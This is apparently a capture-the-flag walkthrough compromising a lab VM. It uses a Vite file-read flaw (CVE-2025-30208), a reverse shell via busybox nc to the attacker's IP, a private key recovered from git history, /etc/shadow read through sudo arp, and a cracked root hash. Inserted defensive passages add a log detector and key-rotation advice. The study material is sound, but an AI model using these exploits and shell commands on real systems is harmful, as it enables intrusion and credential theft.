Temp-DevOops-Walkthrough
城南花已开

Information Gathering

Service Detection

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.157 08:00:27:3b:09:80 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e0:e5:17 VMware, Inc.
^C
export ip=192.168.60.157
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.157:3000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-27 14:50 CST
Initiating ARP Ping Scan at 14:50
Scanning 192.168.60.157 [1 port]
Completed ARP Ping Scan at 14:50, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:50
Completed Parallel DNS resolution of 1 host. at 14:50, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:50
Scanning 192.168.60.157 [1 port]
Discovered open port 3000/tcp on 192.168.60.157
Completed SYN Stealth Scan at 14:50, 0.04s elapsed (1 total ports)
Nmap scan report for 192.168.60.157
Host is up, received arp-response (0.00039s latency).
Scanned at 2025-04-27 14:50:12 CST for 0s

PORT STATE SERVICE REASON
3000/tcp open ppp syn-ack ttl 64
MAC Address: 08:00:27:3B:09:80 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

Only one port is open: 3000.

Let's try visiting it.

It turns out to be the Vue.js getting-started page.


Enumerate directories; this is honestly quite slow.

❯ gobuster dir -u http://$ip:3000 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 50 -x php,html,zip,txt -b 404,403 --exclude-length 414
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.157:3000
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] Exclude Length: 414
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.txt (Status: 200) [Size: 301]
/server (Status: 200) [Size: 21764]
/sign (Status: 200) [Size: 189]
/execute (Status: 401) [Size: 48]

Visit /server, /sign and /execute in turn.

/server returns the application's source code.

❯ curl $ip:3000/server
import __vite__cjsImport0_express from "/node_modules/.vite/deps/express.js?v=8bc9628c"; const express = __vite__cjsImport0_express.__esModule ? __vite__cjsImport0_express.default : __vite__cjsImport0_express;
import __vite__cjsImport1_jsonwebtoken from "/node_modules/.vite/deps/jsonwebtoken.js?v=8bc9628c"; const jwt = __vite__cjsImport1_jsonwebtoken.__esModule ? __vite__cjsImport1_jsonwebtoken.default : __vite__cjsImport1_jsonwebtoken;
import "/node_modules/.vite/deps/dotenv_config.js?v=8bc9628c"
import __vite__cjsImport3_child_process from "/@id/__vite-browser-external:child_process"; const exec = __vite__cjsImport3_child_process["exec"];
import __vite__cjsImport4_util from "/@id/__vite-browser-external:util"; const promisify = __vite__cjsImport4_util["promisify"];

const app = express();

const address = 'localhost';
const port = 3001;

const exec_promise = promisify(exec);

// Denylist loaded from .env (COMMAND_FILTER); an empty list rejects every command
const COMMAND_FILTER = process.env.COMMAND_FILTER
    ? process.env.COMMAND_FILTER.split(',')
        .map(cmd => cmd.trim().toLowerCase())
        .filter(cmd => cmd !== '')
    : [];

app.use(express.json());

// Denylist check: listed words and a few shell metacharacters are rejected, anything else passes
function is_safe_command(cmd) {
    if (!cmd || typeof cmd !== 'string') {
        return false;
    }
    if (COMMAND_FILTER.length === 0) {
        return false;
    }

    const lower_cmd = cmd.toLowerCase();

    for (const forbidden of COMMAND_FILTER) {
        const regex = new RegExp(`\\b${forbidden.replace(/[.*+?^${}()|[\]\\]/g, '\\$&')}\\b|^${forbidden.replace(/[.*+?^${}()|[\]\\]/g, '\\$&')}$`, 'i');
        if (regex.test(lower_cmd)) {
            return false;
        }
    }

    if (/[;&|]/.test(cmd)) {
        return false;
    }
    if (/[<>]/.test(cmd)) {
        return false;
    }
    if (/[`$()]/.test(cmd)) {
        return false;
    }

    return true;
}

// exec() hands the whole string to a shell
async function execute_command_sync(command) {
    try {
        const { stdout, stderr } = await exec_promise(command);

        if (stderr) {
            return { status: false, data: { stdout, stderr } };
        }
        return { status: true, data: { stdout, stderr } };
    } catch (error) {
        return { status: true, data: error.message };
    }
}

app.get('/', (req, res) => {
    return res.json({
        'status': 'working',
        'data': `listening on http://${address}:${port}`
    })
})

// Issues a guest token signed with the secret from .env
app.get('/api/sign', (req, res) => {
    return res.json({
        'status': 'signed',
        'data': jwt.sign({
            uid: -1,
            role: 'guest',
        }, process.env.JWT_SECRET, { expiresIn: '1800s' }),
    });
});

// Requires "Authorization: Bearer <jwt>" whose payload carries role === 'admin'
app.get('/api/execute', async (req, res) => {
    const authorization_header_raw = req.headers['authorization'];
    if (!authorization_header_raw || !authorization_header_raw.startsWith('Bearer ')) {
        return res.status(401).json({
            'status': 'rejected',
            'data': 'permission denied'
        });
    }

    const jwt_raw = authorization_header_raw.split(' ')[1];

    try {
        const payload = jwt.verify(jwt_raw, process.env.JWT_SECRET);
        if (payload.role !== 'admin') {
            return res.status(403).json({
                'status': 'rejected',
                'data': 'permission denied'
            });
        }
    } catch (err) {
        return res.status(401).json({
            'status': 'rejected',
            'data': `permission denied`
        });
    }

    const command = req.query.cmd;

    const is_command_safe = is_safe_command(command);
    if (!is_command_safe) {
        return res.status(401).json({
            'status': 'rejected',
            'data': `this command is unsafe`
        });
    }

    const result = await execute_command_sync(command);

    return res.json({
        'status': result.status === true ? 'executed' : 'failed',
        'data': result.data
    })
});

app.listen(port, address, () => {
    console.log(`Listening on http://${address}:${port}`)
});
❯ curl $ip:3000/sign
{"status":"signed","data":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOi0xLCJyb2xlIjoiZ3Vlc3QiLCJpYXQiOjE3NDU3Mzk2MTcsImV4cCI6MTc0NTc0MTQxN30.lRzczsYCNGTEypKyVMKNy1rB83m00pZY3T2PLI83y5w"}%
❯ curl $ip:3000/execute
{"status":"rejected","data":"permission denied"}%


My guess is that the JWT needs to be re-signed.

For that we would need to know the secret key.

Enumerate directories again, this time with feroxbuster.

❯ feroxbuster -u http://$ip:3000 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x txt -x zip -x jpg

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.60.157:3000
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [txt, zip, jpg]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 15l 33w 414c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 2l 5w 301c http://192.168.60.157:3000/@fs/.txt
200 GET 2l 5w 301c http://192.168.60.157:3000/.txt
200 GET 2l 5w 301c http://192.168.60.157:3000/@fs/.jpg
200 GET 2l 5w 301c http://192.168.60.157:3000/.jpg
403 GET 11l 32w 374c http://192.168.60.157:3000/.env

A few paths return 403.

The error message reveals that the project lives in /opt/node.


PoC Exploitation

Not much to go on, so search for related CVEs.

There is a fairly recent one, CVE-2025-30208, an arbitrary file read vulnerability in Vite.

Related PoC: 4m3rr0r/CVE-2025-30208-PoC: CVE-2025-30208 - Vite Arbitrary File Read PoC

The Python script isn't actually needed; curl alone is enough.

The bypass consists of appending ?raw?? or ?import&raw?? after the file path in the URL.

Try reading the JWT_SECRET variable from .env.

❯ curl "$ip:3000/@fs/opt/node/.env?raw??"
export default "JWT_SECRET='2942szKG7Ev83aDviugAa6rFpKixZzZz'\nCOMMAND_FILTER='nc,python,python3,py,py3,bash,sh,ash,|,&,<,>,ls,cat,pwd,head,tail,grep,xxd'\n"
//# sourceMappingURL=data:application/json;base64,[inline source map omitted]%
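From the defender's side, the request above has a recognisable shape. The following is an added example, not part of the original walkthrough: a small detector that parses combined-format access-log lines and flags the request patterns used here against the Vite dev server (an /@fs/ path, a ?raw?? or ?import&raw?? suffix, a dotfile read). The log lines are constructed for the demo, and the log format and indicator names are my assumptions.

```javascript
// Added example, not from the walkthrough: flag access-log entries matching the Vite
// dev-server request shapes seen above. Log lines are constructed for the demo.
const SAMPLE_LOG = [
  '192.168.60.100 - - [27/Apr/2025:15:02:11 +0800] "GET /sign HTTP/1.1" 200 189 "-" "curl/8.5.0"',
  '192.168.60.100 - - [27/Apr/2025:15:03:40 +0800] "GET /@fs/opt/node/.env?raw?? HTTP/1.1" 200 301 "-" "curl/8.5.0"',
  '192.168.60.100 - - [27/Apr/2025:15:03:41 +0800] "GET /@fs/etc/passwd?import&raw?? HTTP/1.1" 200 1201 "-" "curl/8.5.0"',
  '192.168.60.100 - - [27/Apr/2025:15:04:02 +0800] "GET /src/main.js?import HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
  '192.168.60.100 - - [27/Apr/2025:15:05:00 +0800] "GET /execute?cmd=id HTTP/1.1" 401 48 "-" "curl/8.5.0"',
];

// Combined log format: client, ident, user, [time], "METHOD target PROTO", status, size, ...
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)/;

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const [, client, time, method, target, status, size] = m;
  const q = target.indexOf('?');
  return {
    client, time, method, size, status: Number(status),
    path: q === -1 ? target : target.slice(0, q),
    query: q === -1 ? '' : target.slice(q + 1),
  };
}

// Each indicator is a name plus a predicate over the parsed request
const INDICATORS = [
  // /@fs/ serves files by absolute path; outside the dev server's allow list it should be a 403
  { name: 'vite-fs-path', test: r => r.path.startsWith('/@fs/') },
  // the doubled '??' after raw / import&raw is the suffix form used to slip past the allow check
  { name: 'vite-raw-double-qmark', test: r => /(^|&)(import&)?raw\?\?/.test(r.query) },
  // dotfiles such as .env are never legitimate dev-server assets
  { name: 'dotfile-read', test: r => /\/\.[^/]+$/.test(r.path) },
];

// Returns one finding per line that trips at least one indicator
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const req = parseLine(line);
    if (!req) continue;            // unparseable lines are skipped, not fatal
    const hits = INDICATORS.filter(i => i.test(req)).map(i => i.name);
    if (hits.length > 0) {
      findings.push({ client: req.client, time: req.time, path: req.path,
                      query: req.query, status: req.status, indicators: hits });
    }
  }
  return findings;
}

for (const f of scanLog(SAMPLE_LOG)) console.log(JSON.stringify(f));
```

A single /@fs/ hit can be legitimate in development (linked workspace files are served that way), so the useful alert is the combination: an /@fs/ path with a doubled ?? suffix, or any 200 for a dotfile. The same predicates work on a reverse proxy's log in front of the dev server, which is where such a service should be logged anyway.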


From the source code analysis:

Authentication is not based on a cookie.

It uses the authorization request header, whose value must start with Bearer.


.env also contains the word filter for command execution.

It blocks most of the commonly used commands.

COMMAND_FILTER='nc,python,python3,py,py3,bash,sh,ash,|,&,<,>,ls,cat,pwd,head,tail,grep,xxd'

wget, however, is not filtered.

Write a rev script locally.

Testing shows that on this target a reverse shell only works through ash.

cat /var/www/html/rev
busybox nc 192.168.60.100 4444 -e ash

Run it.


tail -f /var/log/nginx/access.log
192.168.60.157 - - [27/Apr/2025:16:12:21 +0800] "GET /rev HTTP/1.1" 200 50 "-" "Wget"
----------------------
chmod +x rev
./rev

User Privilege Escalation

Start the listener.

Gathering information again reveals three users: runner, hana and gitea.

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.60.100
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from devoops.hmv-192.168.60.157-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[!] Python agent cannot be deployed. I need to maintain at least one basic session to handle the PTY
[+] Attempting to spawn a reverse shell on 192.168.60.100:4444
[+] Got reverse shell from devoops.hmv-192.168.60.157-Linux-x86_64 😍️ Assigned SessionID <2>
[+] Shell upgraded successfully using /usr/bin/socat! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/devoops.hmv~192.168.60.157_Linux_x86_64/2025_04_27-16_29_24-963.log 📜
───────────────────────────────────────────────────────────────────────────
/bin/sh: can't access tty; job control turned off
/opt/node $ id
uid=1000(runner) gid=1000(runner) groups=1000(runner)
/tmp $ cat /etc/passwd|grep /bin/sh
root:x:0:0:root:/root:/bin/sh
runner:x:1000:1000:::/bin/sh
hana:x:1001:100::/home/hana:/bin/sh
gitea:x:102:82:gitea:/var/lib/gitea:/bin/sh

Since there is a gitea user, a Gitea service must be deployed.

Checking the listening ports shows 3002 open on localhost.

/tmp $ netstat -luntp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3002 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3000 0.0.0.0:* LISTEN 2672/node
tcp6 0 0 ::1:3001 :::* LISTEN 2678/node

Look at the related configuration file.

/tmp $ ps aux|grep gitea
2503 root 0:00 supervise-daemon gitea --start --pidfile /run/gitea.pid --respawn-delay 2 --respawn-max 5 --respawn-period 1800 --capabilities ^cap_net_bind_service --user gitea --env GITEA_WORK_DIR=/var/lib/gitea --chdir /var/lib/gitea --stdout /var/log/gitea/http.log --stderr /var/log/gitea/http.log /usr/bin/gitea -- web --config /etc/gitea/app.ini
2504 gitea 0:23 /usr/bin/gitea web --config /etc/gitea/app.ini
2984 runner 0:00 grep gitea

.git Leak

The configuration is as follows:

/etc/gitea $ cat app.ini
# Configuration cheat sheet: https://docs.gitea.io/en-us/config-cheat-sheet/
RUN_USER = gitea
RUN_MODE = prod
APP_NAME = Gitea: Git with a cup of tea
WORK_PATH = /var/lib/gitea

[repository]
ROOT = /opt/gitea/git
SCRIPT_TYPE = sh

[server]
STATIC_ROOT_PATH = /usr/share/webapps/gitea
APP_DATA_PATH = /var/lib/gitea/data
LFS_START_SERVER = true
HTTP_ADDR = 127.0.0.1
HTTP_PORT = 3002
SSH_DOMAIN = devoops.hmv
DOMAIN = devoops.hmv
ROOT_URL = http://devoops.hmv:3002/
DISABLE_SSH = false
SSH_PORT = 22
LFS_JWT_SECRET = 22TYqzojoq0KDtQOfuuiF8ir5_LlqVcc0FeNgTu-OkU
OFFLINE_MODE = true

[database]
DB_TYPE = sqlite3
PATH = /opt/gitea/db/gitea.db
SSL_MODE = disable
HOST =
NAME =
USER =
PASSWD =
SCHEMA =
LOG_SQL = false

[session]
PROVIDER = file

[log]
ROOT_PATH = /opt/gitea/log
MODE = file
LEVEL = debug

[lfs]
PATH = /var/lib/gitea/data/lfs

[mailer]
ENABLED = false

[service]
REGISTER_EMAIL_CONFIRM = false
ENABLE_NOTIFY_MAIL = false
DISABLE_REGISTRATION = true
ALLOW_ONLY_EXTERNAL_REGISTRATION = false
ENABLE_CAPTCHA = false
REQUIRE_SIGNIN_VIEW = true
DEFAULT_KEEP_EMAIL_PRIVATE = false
DEFAULT_ALLOW_CREATE_ORGANIZATION = true
DEFAULT_ENABLE_TIMETRACKING = true
NO_REPLY_ADDRESS = noreply.localhost

[openid]
ENABLE_OPENID_SIGNIN = false
ENABLE_OPENID_SIGNUP = false

[cron.update_checker]
ENABLED = false

[repository.pull-request]
DEFAULT_MERGE_STYLE = merge

[repository.signing]
DEFAULT_TRUST_MODEL = committer

[security]
INSTALL_LOCK = true
INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3NDUyMTUwNzF9.V87lLErr_xxUZ8Dy1q_ZhOhaS4z-Dxdx0utHgDMOAb4
PASSWORD_HASH_ALGO = pbkdf2

[oauth2]
JWT_SECRET = jkFHJFxfiMkVnNVRqJOz2jkDzsrsBejztF7GlN25l8M

The repository root is /opt/gitea/git.

Under /opt/gitea/git there is a directory named hana.

The node.git directory holds the usual contents of a .git directory, just not under the name .git.

/opt/gitea/git/hana $ cd node.git/
/opt/gitea/git/hana/node.git $ ls -al
total 44
drwxr-xr-x 8 gitea www-data 4096 Apr 21 14:36 .
drwxr-xr-x 3 gitea www-data 4096 Apr 21 14:35 ..
-rw-r--r-- 1 gitea www-data 21 Apr 21 14:35 HEAD
drwxr-xr-x 2 gitea www-data 4096 Apr 21 14:35 branches
-rw-r--r-- 1 gitea www-data 66 Apr 21 14:35 config
-rw-r--r-- 1 gitea www-data 73 Apr 21 14:35 description
drwxr-xr-x 6 gitea www-data 4096 Apr 21 14:35 hooks
drwxr-xr-x 2 gitea www-data 4096 Apr 21 14:36 info
drwxr-xr-x 3 gitea www-data 4096 Apr 21 14:35 logs
drwxr-xr-x 24 gitea www-data 4096 Apr 21 14:36 objects
drwxr-xr-x 4 gitea www-data 4096 Apr 21 14:35 refs

Rename it and look at the git log.

Commit 1994a70 deleted a file.

/opt/gitea/git/hana $ mkdir /tmp/repo
/opt/gitea/git/hana $ cp -r ./node.git/ /tmp/repo/.git
/opt/gitea/git/hana $ cd /tmp/repo/
/tmp/repo $ git log --oneline
1994a70 (HEAD -> main) del: oops!
02c0f91 init: init commit

Look at the commit in detail.

It contains a private key.

/tmp/repo $ git show 1994a
commit 1994a70bbd080c633ac85a339fd85a8635c63893 (HEAD -> main)
Author: azwhikaru <[email protected]>
Date: Mon Apr 21 14:36:12 2025 +0800

del: oops!

diff --git a/id_ed25519 b/id_ed25519
deleted file mode 100644
index a2626a4..0000000
--- a/id_ed25519
+++ /dev/null
@@ -1,7 +0,0 @@
------BEGIN OPENSSH PRIVATE KEY-----
-b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
-QyNTUxOQAAACCMB5xEc6A2I69whyZDcTSPGVsz2jivuziHAEXaAlJLrgAAAJgA8k3lAPJN
-5QAAAAtzc2gtZWQyNTUxOQAAACCMB5xEc6A2I69whyZDcTSPGVsz2jivuziHAEXaAlJLrg
-AAAEBX7jUWSgQUQgA8z8yL85Eg1WiSgijSu3C4x8TVF/G3uIwHnERzoDYjr3CHJkNxNI8Z
-WzPaOK+7OIcARdoCUkuuAAAAEGhhbmFAZGV2b29wcy5obXYBAgMEBQ==
------END OPENSSH PRIVATE KEY-----
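Review bot: deleting id_ed25519 in this commit only removes it from the tree; the blob stays in the object store and `git show 1994a70` prints the whole key, so the key must be treated as compromised the moment the repository is readable by anyone else. The fix is to rotate it (remove the matching public key from the account's authorized_keys and issue a new pair), rewrite history so the blob is gone before the repository is served again, and add a pre-commit secret scan so a private key never lands in a commit in the first place.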

Try using this private key to log in locally as hana.

socat is already present on the target.

/tmp/repo $ which socat
/usr/bin/socat
/tmp/repo $ socat TCP4-LISTEN:4567,fork TCP4:127.0.0.1:22
---------------------------------------
❯ nmap $ip -p 4567
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-27 17:15 CST
Nmap scan report for 192.168.60.157
Host is up (0.00048s latency).

PORT STATE SERVICE
4567/tcp open tram
MAC Address: 08:00:27:3B:09:80 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds

Root Privilege Escalation

Clean up the private key file by removing the leading - that the diff added to each line.

❯ vi id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACCMB5xEc6A2I69whyZDcTSPGVsz2jivuziHAEXaAlJLrgAAAJgA8k3lAPJN
5QAAAAtzc2gtZWQyNTUxOQAAACCMB5xEc6A2I69whyZDcTSPGVsz2jivuziHAEXaAlJLrg
AAAEBX7jUWSgQUQgA8z8yL85Eg1WiSgijSu3C4x8TVF/G3uIwHnERzoDYjr3CHJkNxNI8Z
WzPaOK+7OIcARdoCUkuuAAAAEGhhbmFAZGV2b29wcy5obXYBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
chmod 600 id_rsa
❯ ssh hana@$ip -i id_rsa -p 4567
The authenticity of host '[192.168.60.157]:4567 ([192.168.60.157]:4567)' can't be established.
ED25519 key fingerprint is SHA256:m+ja7x4/2Y4oJwwOsMqZ3cHKH17py0XwXqYOMp30I4A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.60.157]:4567' (ED25519) to the list of known hosts.

devoops:~$ id
uid=1001(hana) gid=100(users) groups=100(users),100(users)
devoops:~$ cat user.flag
flag{03d0e150ae9fc686a827b41e1969d497}

The user may run arp with sudo.

devoops:~$ sudo -l
Matching Defaults entries for hana on devoops:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for hana:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User hana may run the following commands on devoops:
(root) NOPASSWD: /sbin/arp

That means arbitrary files can be read.

Try reading /etc/shadow.

devoops:~$ sudo /sbin/arp -v -f /etc/shadow
>> root:$6$FGoCakO3/TPFyfOf$6eojvYb2zPpVHYs2eYkMKETlkkilK/6/pfug1.6soWhv.V5Z7TYNDj9hwMpTK8FlleMOnjdLv6m/e94qzE7XV.:20200:0:::::
[... omitted ...]
runner:$6$sAhdpizXgKayGrqM$lcoysLIY9dsxpwy6cyWHBS/pPbvG4KmlM06SSad0PIWrJcXssseL4EZxzF369gaPZvgyD5JXKHVCXfFUDjciP/:20199:0:99999:7:::
arp: format error on line 20 of etherfile /etc/shadow !
>> hana:$6$snNJGjzsPo.be3r1$V8NneKBkVIZYE6XOFTk1Bq2Trjyf5lO6uQUcWXogI3IiWDEiBDS2yEdck.hx0dIdmIIHGkJX7cfH3zXqKVXcc1:20199:0:99999:7:::

Try cracking root's hash.

D:\IDM\Compressed\hashcat-6.2.6>hashcat.exe -a 0 -m 1800 hash "D:\Temp\rockyou.txt"

$6$FGoCakO3/TPFyfOf$6eojvYb2zPpVHYs2eYkMKETlkkilK/6/pfug1.6soWhv.V5Z7TYNDj9hwMpTK8FlleMOnjdLv6m/e94qzE7XV.:eris

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: $6$FGoCakO3/TPFyfOf$6eojvYb2zPpVHYs2eYkMKETlkkilK/6...zE7XV.
Time.Started.....: Sun Apr 27 17:45:22 2025 (1 min, 48 secs)
Time.Estimated...: Sun Apr 27 17:47:10 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (D:\Temp\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 76888 H/s (14.21ms) @ Accel:768 Loops:64 Thr:128 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 8355840/14344385 (58.25%)
Rejected.........: 0/8355840 (0.00%)
Restore.Point....: 8257536/14344385 (57.57%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Candidate.Engine.: Device Generator
Candidates.#1....: estampida02 -> ellis17102006
Hardware.Mon.#1..: Temp: 63c Fan: 29% Util: 5% Core: 126MHz Mem:1988MHz Bus:16

Started: Sun Apr 27 17:43:52 2025
Stopped: Sun Apr 27 17:47:12 2025

It took four or five minutes; the password sits fairly deep in the wordlist.

❯ grep -nr "^eris$" /usr/share/wordlists/rockyou.txt
8276650:eris

Try switching user.

devoops:~$ su root
Password:
/home/hana # id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/home/hana # cat /root/*
ssh://runner:Bo6xQ8Vrjm7rV1tii2gfRVW6T59jgGF7novHfQrkU3tzKmzVFxE7278L5raa2x9qCihrTrD6v0fu1m61ZkxJB5Gw@devoops.hmv
ssh://hana:UYi5Moj0BQw0QrGahe7i2Bs6VcyUcQMvmqDPs8aPdy8rJqBrcgPm33hbzBbY8j0og3aHN5bqAbKpze97BCLvuhgL@devoops.hmv
ssh://root:[email protected]

gitea://hana:saki

jwt secret:
y0u_n3v3r_kn0w_1t -> BASE58 -> 2942szKG7Ev83aDviugAa6rF

user flag:
devoooooooops! -> MD5 -> flag{03d0e150ae9fc686a827b41e1969d497}

root flag:
Debug the world -> d36u9_th3_w0r1d! -> MD5 -> flag{a834296543f4c2990909ce1c56becfba}

flag{a834296543f4c2990909ce1c56becfba}
/home/hana #